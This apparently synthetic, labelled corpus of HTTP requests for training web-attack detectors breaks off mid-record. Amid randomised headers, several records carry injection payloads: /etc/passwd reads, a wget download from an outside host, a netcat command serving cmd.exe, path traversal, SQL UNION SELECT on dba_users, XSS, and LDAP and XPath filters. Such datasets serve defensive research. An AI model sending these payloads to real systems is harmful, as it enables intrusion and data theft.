GET /njzfrpTAeo/vziteh9mde71of7mio8t/t98JJHFAD/rtJO1hFs/0njdsrtqe/OqrQv/Il44.shtml?nn=otzF7FlwUce&dm00tth=1aroo9won%29+&Eeazn5ha=E8bgsound%3E+&srcomgdtroe=cEN&e93wwixtbehcmo=62353159&5s=7&7iR5rEth=%29%28++++%7C+++%28qt%3DLhic*%29&w6eS=125&k7=neEYdO1K5tyq&4rel=thc&tfetrhpb=765&llnsen=oiorhrcmtsjeRsS&d3=tatscopy5+var9%25mtrs%3Fhtr HTTP/1.1
Host: www.eLkapj4.com
Connection: jerza6sr
Accept: application/*;q=0.9, audio/*;q=0.0
Accept-Charset: x-mac-chinesesimp, iso-8859-3;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: ceAdL=tE2
Client-ip: 13.61.176.17
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Sun, 15 Jun 08 05:35:23 GMT
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: sohsfM@gllyl.be
If-Modified-Since: Sun, 01 Apr 07 07:07:28 GMT
If-Unmodified-Since: Sun, 18 Jan 04 24:57:22 GMT
If-Match: "z4_QcN@tiYEE4ab9"
If-None-Match: "kB8jxaJMhk.N4CI"
If-Range: "6C1HLBIuBwpGix7hAK"
Max-Forwards: 630
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: Basic aWFidHIxOnR0aWF3
Range: -465,47-4
Referer: /sasha2z/Yplr/exeesr.js
TE: trailers,gzip;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.5 (compatible; MSIE 3.2; Mac OS X; nAsendeeoB; sn32; da4y)
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 7.7 185.125.107.52, HTTP/7.1 40.88.177.238, dealdr/1.2 www.oxa4e.png
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38247
Start - Id: 38237
class: LdapInjection
GET /7amU4ygZxfW0iie0yy9/tmYFZsUP45AvANi/aenee8neet3zda/b7thGzqP/f9tiR/iHSwJoscflrAhT/0cDEWzUMO/ser4w/m1.wlogD/oarfBou.exe?islei=880845403&abrbbYcnadofl=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Ln4=hfeSesiBnta&edin8dead4ast=s%29efeCaphpe&n8dr8mt7=8240030223&Ieetit=ui38&9othmovct=1 HTTP/1.1
Host: 140.202.201.212
Connection: keep-alive
Accept: image/png;q=0.0, audio/x-wav;q=0.0, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, gzip, identity, gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.120.171.48
Cookie: tmqL3crr=dx7tbeTst;llalt=script;eEae=7;callanqOdwn=il74okyRI.;9FyandrDadmint=cyrmsaX5gh~
Cookie2: $Version="802"
Date: Fri, 30 Mar 07 07:27:25 CET
ETag: W/"4bKLWIf8NoM0jqgX"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 18 Sep 06 09:51:03 GMT
If-Unmodified-Since: Fri, 11 Jan 08 08:23:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 487
MIME-Version: 3.3
Pragma: eertnoe=iur
Proxy-Authorization: NTLM a1BkdXRhbmhpcnJpYm5hU3RpZW5UY0RhdDhlc3NsQ3NtY2Vwbkli
Authorization: Basic dGVhNmVlbjp6T21ucw==
Range: -9629,18880-,-775909
Referer: /3end/mCtnamOo/e88rriem/B1hoon/f6axena.wmn
TE: trailers,deflate
Trailer: Connection
User-Agent: dnmdnei (nPC5mcUJn3; hozgi_)
UA-CPU: StrongARM
UA-Disp: 296,8945,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: 2.6 www.nnepvn.png
Transfer-Encoding: identity
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38237
Start - Id: 42981
class: OsCommanding
GET /Taefenxmoep/ovt/YYP@qn5xmlF/i_yNgz8sNr/qnehwTerodnadmcso3ae/ceeixs6tcehtwiien/qEme.pl?zo=cathShadyftpi%3Ahm3nh%7Csseval4&isOzIhmu9=bodyt1a0de7Dnb&tace9ft=seewgett&fhE=igwinnt5&aa=831016&4ideFnaiiw=arsy+62%5Cilxjhal&ewHraadman=a57th&euipeceheksMdq=oa&sodcrnji=o4ee&lkey=y-9HPPvTo&eeenemytsdues=gMrErpycN&raoie=6 HTTP/1.1
Host: 114.152.54.158
Connection: ierec
Accept: image/jpeg;q=0.1, application/postscript, video/*
Accept-Charset: iso-8859-8-i, hz-gb-2312;q=0.8, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=128
Cookie: 5ti5sced8=10065853;pvyMiiR=cat  /etc/passwd |;t0efmhmoaitorme=99_EL
ETag: W/"hihhRMqJ3pb0C8609wd3"
Expect: jrornf
From: 7MeMfe@gyahIt.cz
If-Modified-Since: Fri, 26 Jun 09 01:28:29 CET
If-Match: "ugc6QXe.lZqgVCPdlJ"
If-None-Match: "AKn7c0AA_Ww5XNhEvY"
If-Range: *
Max-Forwards: 8
Pragma: ioLa=r21h
Referer: http://hsnp9q.fr/Te59a/ssaT/stQlteo/egni/e7tieed.jsp
User-Agent: dDBOdO-.oo http://www.jevrb.org
Via: 5.0 www.1Gta2c.gif, 7.4 114.186.42.0
Transfer-Encoding: identity
Warning: 055 195.137.35.49:92 "jdexaiziwgasniwit" "Thu, 24 Mar 05 18:17:35 UTC"
----: -------------

null

End - Id: 42981
Start - Id: 43650
class: OsCommanding
POST /oenzelwvmmhraee/yI17D1ImxUNH0/ddchroszgLiEnM1/dsite0thz7C/PJme72qr/er4sht5lrxcdtacIp8ha/aHsinuoea/umgHVVD6I@8O8c.shtml? HTTP/1.1
Content-Length: 110
Content-Language: ss1ni,jaB
Content-Encoding: compress
Content-Location: http://8pntzrd5.be/eelWhe.pdf
Content-MD5: aGpJdWVlZVRuYzF3ZW85bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Dec 06 21:19:34 CET
Last-Modified: Sat, 28 Jan 06 13:05:28 GMT
Host: 53.175.227.67
Connection: ww3in
Accept: */*
Accept-Charset: us-ascii;q=0.5, euc-jp, euc-jp, iso-8859-8-i;q=0.8, cp-932;q=0.8
Accept-Encoding: identity, compress, compress;q=0.4, gzip, identity;q=0.9
Accept-Language: *
Cache-Control: max-stale=32813
Client-ip: 43.252.213.177
Cookie: ir=22;tsogeIo6ear=" ;    /usr/bin/wget  www.rosiie.com/strevete    ;
Cookie2: $Version="06"
Date: Thu, 26 Jan 06 05:10:16 CET
ETag: "w-x.E9Vn59L2EaEoRS"
Expect: 100-continue
If-Modified-Since: Fri, 18 Dec 09 16:34:25 UTC
If-Unmodified-Since: Sat, 03 Jan 04 12:32:46 GMT
If-Match: *
If-None-Match: *
If-Range: "lPCtRIqfU5I7_iqgVuvu"
Max-Forwards: 9
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bWl0c2V1ZGE6dGpyd2c=
Authorization: Digest nonce
Range: 449-,60-
Referer: http://www.ay6lrz.net/heqo/moatqht/o5er/umeae/m4tNc.mpeg
TE: trailers,chunked,deflate
Trailer: From
User-Agent: otNttea (7B1Asrkp)
UA-Disp: 6781,467,32
UA-Pixels: 175x4685
Via: ImoEn/4.7 www.cIdep.jpg, HTTP/4.1 www.aeaiaEqp.js, 4.4 34.154.186.184:2
Transfer-Encoding: deflate
Warning: 683 61.203.57.128 "aist" 

9o= http[ex&oi1dElet=47689&9maeIccifce=r&tmc=t'Al&ot5fwha=AepNwWoaosmi9st&Rkare5ohr3a=353&rx0cmdWeuizi3=57

End - Id: 43650
Start - Id: 45732
class: PathTransversal
GET /rBFzO_zSI/noo7hhmso/wp-z/uk/t2uPNsqjta3eieacnu.nsf?syjoxA2opusrat=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&nlwaeAra=lgiut&cj=10698&x1eera=e&yomkqh=m HTTP/1.0
Host: www.gopdjl.fr
Connection: close
Accept: */*
Accept-Charset: windows-1252, windows-1258;q=0.7, euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=64
Client-ip: 195.187.195.167
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sat, 14 Jul 07 18:33:18 GMT
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: 9e6jh@oniedt.gov
If-Modified-Since: Sun, 22 Jun 08 19:33:06 CET
If-Unmodified-Since: Wed, 24 Mar 04 06:38:04 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Aug 04 06:18:04 CET
Max-Forwards: 847
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: http://www.ihie4tt.ch/l0iu/lcaxmse.dll
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: 81fHtciuefthegdov1E
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: 8.2 234.125.69.23, 0.5 www.cne4s4.html
Transfer-Encoding: compress
Upgrade: eebc/8.1, RfQc/0.5, iec/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 8691156680012
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45732
Start - Id: 42819
class: OsCommanding
POST /aNDzms1qm.htm? HTTP/1.1
Content-Length: 143
Content-Language: qptttm,j8,h2ddw
Content-Encoding: compress
Content-Location: /Vlaeam/ErioUeu/eroe13oe/meno6i.nsf
Content-MD5: Y2ZFdHNpdHJvZW9oNXlhVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: www.ursnlwca.ch
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.6, cp-936;q=0.0, iso-8859-2;q=0.2, macintosh, windows-1253;q=0.0
Accept-Encoding: identity;q=0.4, gzip, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=829
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="5"
Date: Sat, 13 Oct 07 02:20:41 CET
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Fri, 18 Mar 05 05:04:36 UTC
If-Unmodified-Since: Fri, 14 Mar 08 11:57:36 CET
If-Match: "itmYRfSEF_OuuO0xH"
If-None-Match: "DCbs8O6ffKpmP88g"
If-Range: *
Max-Forwards: 8
Pragma: gNl=eeior
Proxy-Authorization: Digest nonce
Authorization: Digest username="mmcvedo"
Referer: http://www.ss9sfy.it/kmfri3.php3
TE: deflate,chunked;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.3 (X11; U; Linux i586 9.8; E6-nj; rv:9.3.2) Gecko/37936637
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: deflate
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

o2tateo4Lb9=|shell(  "cmd    /c     c:InetpubwwwrootMSISSnc.exe   -l     -p 9667     -t   -e     cmd.exe     "     )  |     '

End - Id: 42819
Start - Id: 46504
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.Brn1ldimt.de
Connection: tttt9sa
Accept: application/postscript;q=0.0, application/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: eohn1=y
Client-ip: 200.157.87.196
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="761"
Date: Thu, 08 Jan 09 13:50:42 UTC
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: otetPscl
From: piteR@trksge.gov
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: "-1jN9dtO3SF3qg4Te"
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: psifynim='lzdt8o'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic b1czY3BzOm5jaWh5Yg==
Range: 8817-695585,1-
Referer: /pitfwmeR/ssa4e0/io1e8d/cAfYm/lwxje2nw.mpg
TE: trailers,trailers
Trailer: Date
User-Agent: tvjkBz4 http://www.sa22owab.ch
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/6.1 236.209.231.19
Transfer-Encoding: emAa; ixUng=u0dtwh
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 834 www.Zmliw.gif "s7aFxS3" "Wed, 07 Dec 05 08:00:39 CET"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46504
Start - Id: 41545
class: SqlInjection
PUT /iN29UO0l_hjQPcsG5/steiiihbnigtEaree/tpWW@6T8U.4wVPmGCtq/s-q/nfrom5@/hishinhz6oSs19ieioct/oufLv.msf? HTTP/1.0
Content-Length: 380
Content-Language: 9a
Content-Encoding: deflate
Content-Location: /eeny6/itsrN/tE1unee3/frluz.txt
Content-MD5: cHJlcGdlZWVyNEVyb01yNw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Sep 09 13:44:56 GMT
Last-Modified: Thu, 22 Apr 04 11:06:31 UTC
Host: 107.63.101.61
Connection: keep-alive
Accept: image/png
Accept-Charset: x-mac-turkish;q=0.6, windows-1257, ks_c_5601-1987;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 141.137.190.71
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Fri, 01 May 09 07:24:40 UTC
ETag: W/"BKJattGgCYv68aa@O2Ah"
Expect: 100-continue
From: gJohs0a@amewNlgh.cz
If-Modified-Since: Sun, 26 Apr 09 23:35:43 GMT
If-Unmodified-Since: Sat, 29 Jan 05 02:49:47 UTC
If-Match: *
If-None-Match: *
If-Range: "EgnwBj1bWO_2vgcmBz"
Max-Forwards: 44
MIME-Version: 6.1
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 277481-,6038-
Referer: /lpi0/ivlbYaa7/1Hms9nd9.wav
TE: trailers,chunked
Trailer: Expect
User-Agent: tx0jli (uHEL4Hdv; cAx1OMA; oTKHcES; n7GjzQT; shai-dN)
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8585x974
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: deflate
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 
X-Forwarded-For: 84.75.227.228
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

npdT7teMyAe1u=bc&md3g=649754155&oughwlonsadoeh=ryM4 gih'winntzon&vasab3na=ctsnp'/**/UNION/**/SELECT/**/ahkvutwsv/**/FROM/**/dba_users/**/WHERE/**/nlaR/**/like/**/'%25&spniaetse=w&yooaryhlq=eijddd(oo&lpXbmconva=stjohNsovAretc&dIie9lWnH4ss=511&MOg=15245&xoS=n 0aeh> se&LUiB3mz=o.YADN.H.14&1nsoel=uni57i;acge&duiehsgraLluwv=aT8 A @

End - Id: 41545
Start - Id: 48512
class: XPathInjection
PUT /childechoconnectarxR4/s4qGGZZLVtGSlYeRHN/zpavqWFWqk-SFBdJ/nzmZA4Pfv/bOHXVpassthruP.mspx? HTTP/1.0
Content-Length: 371
Content-Language: x6
Content-Encoding: compress
Content-Location: /9dbi9ela/tRyrctt/r8wyawe.js
Content-MD5: SmVlM29jYW91TjBsZWh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Sep 08 11:17:15 CET
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: 211.8.201.64:9879
Connection: close
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 222.213.45.140
Cookie: 7l=3vE;e1eXvbscriptLEU=104;sht=dhTdter9snlin8hc;paa8qitL8ahuki=39044;rn=of
Cookie2: $Version="5"
Date: Fri, 16 Mar 07 03:37:35 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: *
If-None-Match: *
If-Range: "DQxam.gceadvbjdp"
Max-Forwards: 68
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="toiqs"
Authorization: NTLM dE5yYmxvMXJlYW5lYmNuSHNBYXN0ZGF1RGxlcDBJQmMzT0ls
Range: 811682-312,0-
Referer: http://4c9nt.ch/eeg5lt.mdb
TE: trailers
Trailer: From
User-Agent: Mozilla/2.8 (Windows; U; WinNT 9.8; lz-7e; rv:8.7.3) Gecko/40665724
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 951x0046
Via: HTTP/6.9 www.bqho.jpg:84128, FTP/4.0 217.165.64.207
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ugueo0HpnR6emc=80020964&Malld0x=gVP_gJWdY&2BCB=hiwr7RouChwe:&mlrlehsoncd==bodyqeT&yAIneiRest=a @ran$as8fee]eeChnb&misoXdri7a=7482&Onbbnyeron=s u'4rmsxtermS5ph5ecs&2aheoynrp7kt=wdhi/rdde/nitw7/child::node()[ position()=559] | Rfc7/je/9c4t/child::text()[position()=727]   or   'achom'    =    '&ost=brar

End - Id: 48512
Start - Id: 49222
class: XPathInjection
GET /qhOr@/.VqDeL9L@42htf/nW-/ocoim/e5taeLiGAk4Ej@L0v64/l2.7qA/wamt0ootm7Mr.bin?2varqx7=nlpe&NdisdgsTsrf=esnLae%27+++or+%28i+++%3C+count%28d4u5%2Fchild%3A%3Atext%28%29%29+and+++j+%3C++++count%28aiNu%2Fchild%3A%3Acomment%28%29%29+++++and+++++k++++%3C+count%28tDzr%2Fchild%3A%3A*%29++++%29+++or+++%27ioeea%27++++%3D++++%27+ta94nhd%27++++or HTTP/1.1
Host: www.jasa.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=7464
Client-ip: 22.111.61.54
Cookie: nst=g\|A 
Cookie2: $Version="95"
Date: Fri, 12 Oct 07 24:32:50 GMT
ETag: W/"wqiL1g8LNgzIAAzcyrE"
Expect: abmihnim
From: 92fxf@rrjet00.biz
If-Modified-Since: Fri, 19 Jun 09 06:34:04 CET
If-Unmodified-Since: Sun, 05 Dec 04 22:50:02 GMT
If-Match: "@yp7--orXcGeBrzj."
If-None-Match: "ijD3huhYH@y69I79kC"
If-Range: Mon, 04 Oct 04 01:49:25 GMT
Max-Forwards: 9
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: 2teif iieie=inEgea
Authorization: Digest realm
Range: 43152-,41540-0,9210-
Referer: /octfeqth/nhentt/pbqD7x/lhnwy2Kn/ss6srh.txt
TE: trailers
Trailer: Accept-Encoding
User-Agent: ottennn
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4886x7774
Via: 8.9 www.Qeg3oe.png
Transfer-Encoding: gzip
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 312383203635
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49222
Start - Id: 39049
class: LdapInjection
PUT /toYGp1wnYoig/izAhp1zaSrssEbs84ah/2rMlndpnel.sh? HTTP/1.1
Content-Length: 223
Content-Language: 2ealdd,hIyttTaA
Content-Encoding: gzip
Content-Location: http://jertu.fr/tenfl/osur/32ae.txt
Content-MD5: VGdudGRhbG9zemtlMEVuNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 05:32:22 UTC
Last-Modified: Thu, 08 Feb 07 10:42:09 CET
Host: www.Eaemo3sm.net
Connection: keep-alive
Accept: image/gif;q=0.9, video/*;q=0.3, application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: enDsm)(&(objectClass =    Di*)
Accept-Language: hsmte)( |(aDuhn=*)
Cache-Control: oao4NHe=cre5et8a
Cookie: wiieEeazente=dzx8E8G6i;hirhseaaipttAo=nedgnrrmodxhtebe;9497rNc6sae=n-5MFdM;opst2l=>cglo;LWDdBsvrYfu=nuQ52cL
Date: Wed, 23 Feb 05 09:47:10 CET
ETag: W/"3cB9HlpJ4rG0odJ"
Expect: nt9qbtya
From: mnr2@yerlneae.net
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: "yNzxsuUibc8-Pkge"
If-None-Match: "vfVaWdtScYjFl6jqVaN"
If-Range: "0G6MMHGpRW651o1kjuK"
Max-Forwards: 95
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM eUMwSHQ5aENzb29hZWRUY2Flcmd3aHBlOGVleTBydGVkcmliaA==
Authorization: NTLM OHJwNnlpOGFpZXNhb2FhbXJldGRzZ3N2ZmlFZGFFbXJyZQ==
Referer: http://tftje.cz/tpyw.fgf
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: lnIt (oV0QKxS; dyI89-; oim5FTT; e48dLZ6Y5U)
UA-Color: color16
UA-Pixels: 3109x9976
Via: nut5/4.8 241.253.246.230, smi/0.0 www.ta6s.htm, ist/2.7 15.113.78.236
Transfer-Encoding: gzip
Upgrade: rfthn/1.0, tegk/3.0, esey/1.5, sfM1/8.0
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iiiat=sz&qabinme=9&xZSP=51237&iSrec=7hbj3h&oaghdHhi=6&IorvD3_v=84041259&aAtTroddap=qidd&cxlexSef=88369425&sExmtfua=wherehde9HhgEm&7doiikgeh=s6u8d5e&buteE=fMux0niBW2pu&h81dgtaotw=oda aRishrcphEDer&PnttsadIine1ziE=0Nueaoeo4ey

End - Id: 39049
Start - Id: 42123
class: SqlInjection
GET /osebtholwN.tiff?uhaejneatt=8&jt=d%27++UNION+++++ALL+++SELECT+++ev+FROM+++srys++++WHERE+++++%27%27++%3D++++%27&5DdktgsmappAg=iH3 HTTP/1.1
Host: www.htare.ch
Connection: close
Accept: audio/basic, audio/x-wav;q=0.8, video/*;q=0.4
Accept-Charset: windows-1253, utf-7, isiri-3342
Accept-Encoding: *;q=0.9
Accept-Language: s6-y, hhso3hBa-6E4tie7;q=0.2, jyvl-l1uHe8et;q=0.1, a-2e, ophoA-ladirk0;q=0.0
Cache-Control: only-if-cached
Client-ip: 209.54.39.204
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Thu, 18 Mar 04 12:23:36 CET
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: stgPOeE@DeaasWp.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: *
If-Range: "nV5hux00tnvHcloCn5l"
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: nerr ixhz=e7ivri
Range: 80-3804,023297-91,09-
Referer: /ptE3/qwusO/kjdils7.bin
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (X11; U; Open BSD i586 7.9; xt-ns; rv:9.9.7) Gecko/91091874
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: 1.5 www.hao5se.jpg, oape/2.8 www.elob7ps.jpeg, FTP/8.6 www.hcut.png
Transfer-Encoding: dJbwaz; rtPnceer=rhtsuh
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42123
Start - Id: 35382
class: SqlInjection
GET /iIlegNalaoby/ntgialerv/0cXhDJtWaJVUSC2/tSRQCk3m.X/atqtttk/Jpc9/duen/iyaran/eime2T5fdeaees5stih/nu7ertgemNe1.js?levs2yepos=48&apbsithaenl=667281&hi=reoA-&sq=hEegyettn8qlmisw&n8ptfenzoohTete=eg_cnQvChFS&rrfrtngde39ut=%3D%40&echo3Qm522copy7nulldv=4&eneaysbdfoc=system%40eghome3bnyastyle6mhayhq&s3yttn4wttk=o&ta=osenirvarchetcs+ac%7Em9&xeshxueaeaemr=UtEbDechoeesDw&eeikierbnw=%27++%29+++UNION+ALL+SELECT++++so++++FROM++++eooe++++WHERE+++%28%27%27+++%3D+++%27 HTTP/1.0
Host: 45.245.49.167:2070
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2958
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Fri, 05 Feb 10 09:53:38 UTC
ETag: W/"YrySjLvL9c7uR21"
Expect: 100-continue
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VNicCa.swHjH.3sTQ51D"
If-None-Match: "nZsX-_rwsF3vYgLqqpXS"
If-Range: Wed, 07 May 08 02:38:29 GMT
Max-Forwards: 58
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: NTLM aWFoanN0aXZlZWdsZXcwbFNnd2dlcnRycG90ZG1oVTJobmRuckVX
Range: 55-,0-,6611-
Referer: http://www.hfwfdqi.biz/uspregte.css
TE: trailers
Trailer: Transfer-Encoding
User-Agent: bW8OY2@_ http://www.tsmhBe.st
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 7.9 www.dkoTl.tiff, HTTP/4.7 www.7aio5.png
Transfer-Encoding: compress
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35382
Start - Id: 37839
class: LdapInjection
GET /iidbeipAc/_aKJjIUM/3EcjqlQFdgPL18fjJPQO/g4tyaiisostapuh/euA.ClwKbOI0yihcu/samxpEt.nhttpmDS4/506BPJBy/rat/ovV0TWd8i1h5K58j.php4?A5PAhoexecrwhererA4=mwAOXnKD&HtieiAssdEssm=2tbt7R475thshuia2l&GdfQktKTlike=Dc%7Cis&Dyi=h6%3Doi%3E1efotlbOo&eDh2Tq=5Mjtm3n0en0trnotdv&eiau1s3lcaalte=sNm&fjIdrA=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&lXikhkitoHraa=+e&eryo4rm=5569 HTTP/1.0
Host: 249.113.218.128
Connection: close
Accept: text/plain, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 7.198.93.40
Cookie: o3iasEe=slUW1Uqb@;lwoooizhhkoUnud=16018264;tmssQrt=script<oqa e<iaoiowinntvetp
Cookie2: $Version="3"
Date: Tue, 05 Jan 10 12:55:26 CET
ETag: "v.u7W79d5gfnlTy"
Expect: lw1usH=epexaq
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
